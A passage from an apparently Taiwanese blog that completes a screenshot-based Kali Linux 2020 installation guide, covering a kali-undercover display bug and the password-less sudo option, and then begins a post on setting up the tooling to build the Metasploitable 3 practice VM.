<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jx730cpkt24WwXcIfqa8nWuoFFhAx2ekOm6Da57NBKpbGb-T7irxpJsMJqre7MeVbiApudY5yHG9BrZg0hqDtvhbJeymAWuHyDOXjsyVGCAJWI54Eydx6Txi9d2sN2PQlj2TmaEkgDr2/s1600/kali-2020_14.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="605" data-original-width="807" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jx730cpkt24WwXcIfqa8nWuoFFhAx2ekOm6Da57NBKpbGb-T7irxpJsMJqre7MeVbiApudY5yHG9BrZg0hqDtvhbJeymAWuHyDOXjsyVGCAJWI54Eydx6Txi9d2sN2PQlj2TmaEkgDr2/s400/kali-2020_14.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖14:將磁碟分割資訊寫入磁碟</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>15、完成磁碟分割後,就會進行基本系統安裝(圖15),這裡就只能等待,完成後,進入其他設定項目。</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNgZ6ejXHpYTTpu2z3X-IONZAuAsuT9fMLKHUu99vgkundsngFl5Q4PfWetv61V-zuQ9Jy-YoxIKKs971chniKEC8OPx14sdyU6LcMNJwbjGDQwzv42r5J7jaGg0IBGO7kzpQFCCLrQHaj/s1600/kali-2020_15.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="809" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNgZ6ejXHpYTTpu2z3X-IONZAuAsuT9fMLKHUu99vgkundsngFl5Q4PfWetv61V-zuQ9Jy-YoxIKKs971chniKEC8OPx14sdyU6LcMNJwbjGDQwzv42r5J7jaGg0IBGO7kzpQFCCLrQHaj/s400/kali-2020_15.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖15:基本系統安裝中</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>16、設定套件管理程式的第1個畫面是HTTP Proxy設定,如果不是透過Proxy上網,可以留空白,直接「繼續」到下個畫面(圖16)。</b></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgkaJmzd-ZFnGO-UvgP_cgqWx3sQ-jTuV92rirdmF1_VXFIYsOs3QgNFQ4Y5Uj7Vqj-YV5iSxmKoqL7HwWZ0ZETZGk_JHqJksk0jOIqi7sYWIcUQvXIFaXbAKLaooOZ1KRo4LpRmtr5nYE/s1600/kali-2020_16.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="804" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgkaJmzd-ZFnGO-UvgP_cgqWx3sQ-jTuV92rirdmF1_VXFIYsOs3QgNFQ4Y5Uj7Vqj-YV5iSxmKoqL7HwWZ0ZETZGk_JHqJksk0jOIqi7sYWIcUQvXIFaXbAKLaooOZ1KRo4LpRmtr5nYE/s400/kali-2020_16.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖16:設定上網的Proxy伺服器</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>17、接著是設定apt(套件安裝管理員)及安裝基本軟體,請耐心等候!(圖17)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjveOT7-mFsX6spOzTBLcPa78rdqQdKqH-iZVpUTQi5_ADQ7_aYgqurdA6nMbpqR_UZ9Uql6gg6G5ShiBQ6_2CvlqyB_L4AkeolcbxIndqryCRmbv_7RdvuzRMinpgDHqd-NWWPV7dZQS8-/s1600/kali-2020_17.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="809" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjveOT7-mFsX6spOzTBLcPa78rdqQdKqH-iZVpUTQi5_ADQ7_aYgqurdA6nMbpqR_UZ9Uql6gg6G5ShiBQ6_2CvlqyB_L4AkeolcbxIndqryCRmbv_7RdvuzRMinpgDHqd-NWWPV7dZQS8-/s400/kali-2020_17.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖17:安裝基本軟體</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>18、再來就是新版Kali的重點,要裝什麼軟體,由使用者自行決定(圖18)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamOy8xc6AnSAvblzY6Bru4eOSVy9uNf2FebRt5H3ZXZyw3gWZg_4rRFP-mnVYB5dVqa4pDUTEtJJyagZnI03Rpx20Q9CGm8KX-oLYgJcvJTnUN2xAOqYX4cAJLpgcq3iopVPE2pRy8Pf9/s1600/kali-2020_18.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="806" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamOy8xc6AnSAvblzY6Bru4eOSVy9uNf2FebRt5H3ZXZyw3gWZg_4rRFP-mnVYB5dVqa4pDUTEtJJyagZnI03Rpx20Q9CGm8KX-oLYgJcvJTnUN2xAOqYX4cAJLpgcq3iopVPE2pRy8Pf9/s400/kali-2020_18.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖18:使用者自行選擇欲安裝的軟體</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>19、預設桌面環境是Xfce,若喜歡GNOME,可在此增選之。</b></div>
<div style="margin-left: 2em;">
至於其他工具,如果不知怎麼選擇,就全勾吧!或者以預設(default安裝Live模式使用的工具),由於我是貪心的使用者,故將 <span style="color: #990000;"><b>Install tools by purpose</b></span>(依使用目的安裝所需工具)底下的選項全打勾(圖19),免得日後還要逐一安裝,按下「繼續」後就開始安裝套件了,這要一段不短的時間。<br />
期間出現<b>圖20</b>的桌面管理設定,我有選用GNOME,所以要設定預設的管理員,若沒擇安裝GNOME,應該不會有這個畫面吧?</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCO1Wqi1wwO-mKdZt3OeAIkdxh87PJMz6VfNsA6hQidJNPEEB0sFBnm2wGnLj1EV-TQtc4EBDn2GPt_1eDaFV1ZEAVLb2dtHpSyAuKjWq3Ez-RDr3GBQwM3AO13CpC9XDl6hVBOfUwIJfs/s1600/kali-2020_19.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="607" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCO1Wqi1wwO-mKdZt3OeAIkdxh87PJMz6VfNsA6hQidJNPEEB0sFBnm2wGnLj1EV-TQtc4EBDn2GPt_1eDaFV1ZEAVLb2dtHpSyAuKjWq3Ez-RDr3GBQwM3AO13CpC9XDl6hVBOfUwIJfs/s400/kali-2020_19.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖19:筆者將Install tools by puposse的項目都打勾(Reporting除外)</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_vwbPAgJ9o6WwSFhKiw5Te95umAUohcVvlrtTgs72pMSq30ia-SiXV7CCvaly9O4qxsT6wGbYPpsTRaPGLJlTbEdBOj1SGGlQZJMtFIShuVWRgSMQUvBQ1bnLIN5CBfNbIlJKFZmnW5z/s1600/kali-2020_20.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_vwbPAgJ9o6WwSFhKiw5Te95umAUohcVvlrtTgs72pMSq30ia-SiXV7CCvaly9O4qxsT6wGbYPpsTRaPGLJlTbEdBOj1SGGlQZJMtFIShuVWRgSMQUvBQ1bnLIN5CBfNbIlJKFZmnW5z/s400/kali-2020_20.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖20:因多安裝GNOME桌面,設定gdm</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>20、好了,快要安裝完成,接著就是設定開機程式(GRUB),請選擇「是」將GRUB安裝到主開機記錄(MBR)(圖21)。</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgspvmQXcpE2IxXEkevVy2L1QY6UOkBeFHmoPplz4a9bEHvaZwr35vhnKSZ4v49FDUf_6SxGYWTeXze7YCrSNB0IMqrOrPDNoV8xgzBDzKUFWRp5cHx31dGwZZ2IXdHhU-3EA4OYW9tpDST/s1600/kali-2020_21.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="811" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgspvmQXcpE2IxXEkevVy2L1QY6UOkBeFHmoPplz4a9bEHvaZwr35vhnKSZ4v49FDUf_6SxGYWTeXze7YCrSNB0IMqrOrPDNoV8xgzBDzKUFWRp5cHx31dGwZZ2IXdHhU-3EA4OYW9tpDST/s400/kali-2020_21.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖21:將GRUB安裝到主開機記錄區</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>21、進到下一個畫面,因為只有一台磁碟,因此選「/dev/sda」,然後按「繼續」(圖22),再等一下下,就可安裝完成了!(圖23)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifyQB7Ml_7FWlW4mH3qdSORzAgSSL0QjEDGEM4s4K_PaDaz_oVVVIyUbqp2SAn2u9TDtHBPXneFn4Om3y-gckosfFk0hms5y9Rit_DjqFOHrNHEkPfRynTrnZGUsNqjLF5BiVW-DlPfHUG/s1600/kali-2020_22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="806" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifyQB7Ml_7FWlW4mH3qdSORzAgSSL0QjEDGEM4s4K_PaDaz_oVVVIyUbqp2SAn2u9TDtHBPXneFn4Om3y-gckosfFk0hms5y9Rit_DjqFOHrNHEkPfRynTrnZGUsNqjLF5BiVW-DlPfHUG/s400/kali-2020_22.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖22:選擇安裝GRUB的可開機磁碟</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUD3oym8BsYiCS4NYTrjg9O5ZORJONWjzF8tWBBW_vgVuiJEHRetTV2_XOgMOiRTDkG8UTQxSQDooIGgqCmA5HNhOmriu283UhpqEJdot12NDbRSFOjU67bx00Wc7K8FIz8BtC99oXyN1Q/s1600/kali-2020_23.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUD3oym8BsYiCS4NYTrjg9O5ZORJONWjzF8tWBBW_vgVuiJEHRetTV2_XOgMOiRTDkG8UTQxSQDooIGgqCmA5HNhOmriu283UhpqEJdot12NDbRSFOjU67bx00Wc7K8FIz8BtC99oXyN1Q/s400/kali-2020_23.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖23:終於完成系統安裝</td></tr>
</tbody></table>
<div style="margin: 0.5em 0 0 0;">
<span style="color: #0c343d; font-size: large;"><b>登入
</b></span></div>
<div style="margin-left: 2em;">
在安裝時設定使用者名稱(Kea Leave),登入時可以選擇此帳號(圖24),並輸入密碼(圖25),或者要切換x-window環境,可以先點擊「登入」鈕左方的齒輪(圖26),選擇桌面環境,再「登入」。
</div>
<div cellpadding="0" cellspacing="0" center="" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL5ZZQlbC7iYRX4jwI9clPTkaK-CQHE2xc9a75DDOxJjQApAonYE1Nb4e7MFzJGzdvh9vxJ0ZXWRrEHT9r96AvYfXWCFv0PR9TxQEhyphenhyphenZtUZhKco1vals6JooOQmfhFxLI163dIe6VuPPW0/s1600/kali-2020_24.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="528" data-original-width="574" height="367" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL5ZZQlbC7iYRX4jwI9clPTkaK-CQHE2xc9a75DDOxJjQApAonYE1Nb4e7MFzJGzdvh9vxJ0ZXWRrEHT9r96AvYfXWCFv0PR9TxQEhyphenhyphenZtUZhKco1vals6JooOQmfhFxLI163dIe6VuPPW0/s400/kali-2020_24.PNG" width="400" /></a><br />
圖24:選擇登入系統的使用者</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlqaHdG4kgIHAqvsfNphCaEKfiNk5N_Ujdwgzp9NUOuaESsCcO1kSRjuPleq81QD0joz86Q8hpmNaxcvFIUy7JU3SUhmOH2AvYNEpBLg2UFVDJjuBpU_AoZB9JHhRi0bqef9O6OeMW0P3/s1600/kali-2020_25.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="482" data-original-width="474" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlqaHdG4kgIHAqvsfNphCaEKfiNk5N_Ujdwgzp9NUOuaESsCcO1kSRjuPleq81QD0joz86Q8hpmNaxcvFIUy7JU3SUhmOH2AvYNEpBLg2UFVDJjuBpU_AoZB9JHhRi0bqef9O6OeMW0P3/s400/kali-2020_25.PNG" width="392" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖25:輸入使用者密碼</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeZKaMDMut3yuMyFtZUPSl52os9UpYc0xUfLDDEPak7J3exb_xy2Kn2w9f_NwEktmZavAbEer9EFS90LZVWPiCFRzw8jCBCZSSDghK6H4CAgR6khrQv3HzDnHI1Dpa8CDg2Uv-UBbg2fG8/s1600/kali-2020_26.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="463" data-original-width="559" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeZKaMDMut3yuMyFtZUPSl52os9UpYc0xUfLDDEPak7J3exb_xy2Kn2w9f_NwEktmZavAbEer9EFS90LZVWPiCFRzw8jCBCZSSDghK6H4CAgR6khrQv3HzDnHI1Dpa8CDg2Uv-UBbg2fG8/s400/kali-2020_26.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖26:或者先選擇桌面環境,再登入</td></tr>
</tbody></table>
<br />
<div>
<b>圖27A是GNOME界面,圖27A右圖是xfce界,謹供比較。</b></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi2-tbnt03fdAifcnVD9cCAOGVEzMTwyPQcb8hu_BJdFQ7NnZsSZAeX4jtPzIoFWHVLcmxFAIo4k_H-36N5rFp_yTa2AnCZnNkz0f_L_-gM0VlOkZGCZ_y3QQVHrd3jHAaK_T-L0Ui5ifB/s1600/kali-2020_27A.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="618" data-original-width="1293" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi2-tbnt03fdAifcnVD9cCAOGVEzMTwyPQcb8hu_BJdFQ7NnZsSZAeX4jtPzIoFWHVLcmxFAIo4k_H-36N5rFp_yTa2AnCZnNkz0f_L_-gM0VlOkZGCZ_y3QQVHrd3jHAaK_T-L0Ui5ifB/s320/kali-2020_27A.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖27A:GNOME畫面</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgamK5_VA48BU9TKY51MMKKFyXa6r-rQEMbIQqqcavQBl4hvB6gn_y6fqDcXjK3lPiDMh6YNhdxDtKC070b7LtkMABfTVH6JSuvr7UpSrN4OvFedF05PXf9UqW8GVMhp8yg7cJnCN5Gm8pt/s1600/kali-2020_27B.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="704" data-original-width="1233" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgamK5_VA48BU9TKY51MMKKFyXa6r-rQEMbIQqqcavQBl4hvB6gn_y6fqDcXjK3lPiDMh6YNhdxDtKC070b7LtkMABfTVH6JSuvr7UpSrN4OvFedF05PXf9UqW8GVMhp8yg7cJnCN5Gm8pt/s320/kali-2020_27B.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖27B:Xfce畫面</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin: 0.5em 0 0 0;">
<br />
<span style="font-size: large;"><span style="color: #660000;"><b>不知是誰的bug
</b></span></span></div>
<div style="margin-left: 2em;">
在xfce執行 kali-undercover,將界面轉成Windows 10模擬模式(圖28),若未再次執行kali-undercover切回Linux模式,下回啟動成GNOME,會看到終端機的操示符依然停在「C:\home\kali>」(圖29)。</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHe4YidxO_VG0BTk7arLh_DpgBA7M-pyLOKynnZGa2dwgCOj6zXXb9GQEgdGWqBZJ4Qpj10j4Cl6Qv_3GK5V3SLmiw84K2AihpUVFO4-LCnuOIH_bcr4_3RIq0f_dUNyRi5PluzVFT1YTz/s1600/kali-2020_28.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="734" data-original-width="1293" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHe4YidxO_VG0BTk7arLh_DpgBA7M-pyLOKynnZGa2dwgCOj6zXXb9GQEgdGWqBZJ4Qpj10j4Cl6Qv_3GK5V3SLmiw84K2AihpUVFO4-LCnuOIH_bcr4_3RIq0f_dUNyRi5PluzVFT1YTz/s400/kali-2020_28.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖28:切換到Windows 10模擬畫面</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRzK85xzQZOiOyMJcW0S0jW4Sj0adomc8EFeUSqXQ3243T_HbzzaMBNqN8T611Cm4LPyT8H6jNJDSBY1xCGWMJW8pVqUITSSGPRrIoZsJLSzD1vk2ZJw5KZQxWRpVk4UXYGvkPBw9cyvJs/s1600/kali-2020_29.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="404" data-original-width="737" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRzK85xzQZOiOyMJcW0S0jW4Sj0adomc8EFeUSqXQ3243T_HbzzaMBNqN8T611Cm4LPyT8H6jNJDSBY1xCGWMJW8pVqUITSSGPRrIoZsJLSzD1vk2ZJw5KZQxWRpVk4UXYGvkPBw9cyvJs/s400/kali-2020_29.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖29:啟動成GNOME桌面,提示符仍顯示「C:\home\kali>」</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="margin-left: 2em;">
在xfce的Windows 10模擬模式,執行kali-undercover,終端機的提示符回復Kali的樣字,但桌面看起來還是像Windows 10(圖30),與Kali文件所說:再次執行kali-undercover之後會回復前次的布景主體不一樣。
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGXUn0lWFJQt8_UjVo0Y3WUWwgjZwUIp9Mt_kinMPaigisZthDlmmn78a9Wap-LXkN5OgN_2lFdOH1PEPfvja7W-TmvaglwqO8c90pnaFyAklTI8Dh1zw5UeZoQ19YdhxueecFoFDeKsg5/s1600/kali-2020_30.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="737" data-original-width="792" height="371" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGXUn0lWFJQt8_UjVo0Y3WUWwgjZwUIp9Mt_kinMPaigisZthDlmmn78a9Wap-LXkN5OgN_2lFdOH1PEPfvja7W-TmvaglwqO8c90pnaFyAklTI8Dh1zw5UeZoQ19YdhxueecFoFDeKsg5/s400/kali-2020_30.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖30:雖然終端機切回xfce,但桌面看起來仍是Windows 10(和圖27B相比)</td></tr>
</tbody></table>
<div style="margin: 0.5em 0 0 0;">
<br />
<span style="color: #274e13;"><span style="font-size: large;"><b>免密碼的sudo
</b></span></span></div>
<div style="margin-left: 2em;">
2020.1之後已不再有root權限,需要使用sudo才能執行特權指令, 可是sudo會要求驗證密碼(圖31),如果覺得煩,可以執行「udo dpkg-reconfigure kali-grant-root」,然後選擇「Enable password-less privilege escalation」(提權時毋須密碼)(圖32),雖然還是需要「sudo」,但系統不會再問密碼了。
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKQiVH6JN9fwsMUAl_6_-Nyw4an8s8KUEFgODbsxcvH8ozc7E01GJA_CTvIcX4lAD57m9q1RunHE1XBDV-ODMMgF99AiMjobaF2OsWcl0FO9_xBf7lFhdR6ZSdjP44UdWJ2xZdCZLCyvi/s1600/kali-2020_31.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="479" data-original-width="661" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDKQiVH6JN9fwsMUAl_6_-Nyw4an8s8KUEFgODbsxcvH8ozc7E01GJA_CTvIcX4lAD57m9q1RunHE1XBDV-ODMMgF99AiMjobaF2OsWcl0FO9_xBf7lFhdR6ZSdjP44UdWJ2xZdCZLCyvi/s400/kali-2020_31.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖31:使用sudo執行特權指令,需要再次確認密碼</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-F0KFfox7nEuSNWxoZ3lYvL6mN5_47KGFmsHLQHH1UXWY-YSD8dMWFecQ_OYxKNLutTIEy2m6V1n9B51_scvnpkjx68UCq_J4kI98LoX7GWghQCSIEqgNi07YJMS1KFidUltdb_KntI3/s1600/kali-2020_32.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="513" data-original-width="637" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-F0KFfox7nEuSNWxoZ3lYvL6mN5_47KGFmsHLQHH1UXWY-YSD8dMWFecQ_OYxKNLutTIEy2m6V1n9B51_scvnpkjx68UCq_J4kI98LoX7GWghQCSIEqgNi07YJMS1KFidUltdb_KntI3/s400/kali-2020_32.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖32:利用 dpkg-reconfigure kali-grant-root改成不需再次確認密碼</td></tr>
</tbody></table>
<br />
<hr style="color: blue;" />
<div>
<b>這次簡單補充至此,日後若有新的發現,再另為文介紹!
</b></div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com16tag:blogger.com,1999:blog-1967825056283652287.post-37242886300280122202020-01-04T05:55:00.000+08:002020-01-04T05:55:28.399+08:00如何建置metasploitable 3虛擬機<div style="border: #ff3399 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="text-indent: 2em;">
筆者在2016年曾寫了一本「Metasploitable|白帽駭客新兵訓練營」,以Metasploitable 2作為練習標的, Metasploitable 2是以虛擬機映像檔方式發行,很容易部建於VMWare或VirtualBox,然而,RAPID7在2016年底釋出Metasploitable 3,但這一次並非直接以虛擬機映像檔方式發行,而是提供一些腳本,再由使用者自行建置,有關建置說明可以參考:<a href="https://github.com/rapid7/metasploitable3">https://github.com/rapid7/metasploitable3</a>,筆者參考這份說明,卻還是撞了滿頭包,原以為過一段時間就會有人釋出包裝好的映像檔,但網路上搜尋許久,都是自建教學文章,筆者照著文章作,依然處處碰避,最近正好有個工作空檔,可以好好靜心實作,發現原來自建,其實很簡單,特將操作步驟記錄下來。 </div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
一、先<span style="color: #990000;"><b>確認電腦啟用(支援)VT-x或AMD-V</b></span>,不然執行到後段才出現映像檔建立失敗,會浪費不少時間。
</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
二、<b><span style="color: #990000;">Powershell版本至少3.0</span></b>:</div>
<div style="margin-left: 2em;">
筆者是在Windows 7上建置,Win7原本的Powershell版本只支援2.0 ,必須先升級到3.0才可順利執行建置程序。<br />
開啟Powershell後,可先執行「 <span style="color: #351c75;"><b>$psversiontable</b></span>」查看目前支援的版本,若版本未達3.0,可至<br />
<a href="https://www.microsoft.com/en-us/download/details.aspx?id=34595">https://www.microsoft.com/en-us/download/details.aspx?id=34595</a>下載並安裝 <span style="color: #990000;">Windows6.1-KB2506143-x64.msu</span>(或 <span style="color: #990000;">Windows6.1-KB2506143-x86.msu</span>)</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
三、搞定Powershell後,接著<span style="color: #990000;"><b>安裝VirtualBox</b></span>,但<b>建置工具vagrant目前對VirtualBox的支援只到5.2.X版</b>,若電腦是安裝VirtualBox 6.x版,vagrant無法順利執行。筆者是安裝VirutalBox 5.2.34及其擴充套件,VirtuaBox安裝好之後,請關閉VirtuaBox管理界面。</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
四、<span style="color: #990000;"><b>安裝vagrant</b></span></div>
<div style="margin-left: 2em;">
到<a href="https://www.vagrantup.com/docs/installation/">https://www.vagrantup.com/docs/installation/</a>下載vagrant安裝檔(vagrant_2.2.4_x86_64.msi),vagrant安裝後會自動將「安裝路徑\bin」(例如D:\HashiCorp\Vagrant\bin)加到PATH環境變數。</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
五、<span style="color: #990000;"><b>安裝Packer</b></span></div>
<div style="margin-left: 2em;">
到 <a href="https://www.packer.io/intro/getting-started/install.html">https://www.packer.io/intro/getting-started/install.html</a>下載packer_1.5.1_windows_amd64.zip,這壓縮檔裡只有一支packer.exe,將它壓縮到vagrant安裝路徑下的bin目錄裡,就樣就不用特別為packer設定PATH環境變數。</div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
